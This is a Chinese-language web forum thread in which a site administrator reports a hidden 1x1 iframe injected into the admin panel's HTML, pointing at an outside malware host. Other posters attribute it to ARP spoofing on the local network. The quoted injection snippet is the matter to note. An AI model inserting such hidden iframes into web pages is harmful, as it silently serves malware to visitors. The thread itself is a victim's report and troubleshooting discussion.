恐怖 有人中这个木马吗?

从昨天开始~SS后台操作发现木马~~~!!!!
在操作过程中,状态栏显示:正在下载http://cool.47555.com/mm.js
查看源文件，则发现被放了代码<iFrAmE SRc=http://cool.47555.com/k.htm width=1 height=1 frameborder=0></IfRaMe>

太恐怖了～～

从ＦＴＰ上查看了ＡＤＭＩＮ文件夹下的所有文件，又看不出被修改过的痕迹！！！！

怎么办啊？
完整的是这样：
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<iFrAmE SRc=http://cool.47555.com/k.htm width=1 height=1 frameborder=0></IfRaMe><!--Administrator's Control Panel</title>
<link href="http://www.ＡＢＣ.com/admin/images/style.css" rel="stylesheet" type="text/css" />
<link href="http://www.ＡＢＣ.com/images/edit/edit.css" rel="stylesheet" type="text/css" />

TEAM组成员会尽快联系你的....
希望保留服务器日志

补充说明 只在后台操作时候发现~`其他页面则没有~~


谢谢~~
另外,刚才搜索了一下~
有位朋友也中了
https://discuz.dismall.com/viewthread.php?tid=446662

可以对照哪个帖排查一下.最好是能够联系服务器管理员 .

您好,这是您内网有人中了病毒进行arp欺骗攻击.
我建议您联系你的机房管理员,绑顶MAC地址,否则是没有办法解决这样的问题.

当然,您有一些其他什么的问题或是对我的回答有其他看法,可以联系我..

谢谢  我照你说的去看一下~~

另外 这个问题似乎是间歇性的 有时候出现  有时候没出现~
怪在这里~~

你发个短消息给MOKFLY吧。。。。
详细再描述一下。

这样的情况就不奇怪了...
:) 由于是内网的arp,所以间断的出现是很正常的,另外这病毒是寻找title标记然后修改的...

我的今天也中了，惨

这样也能判断是ARP？ F了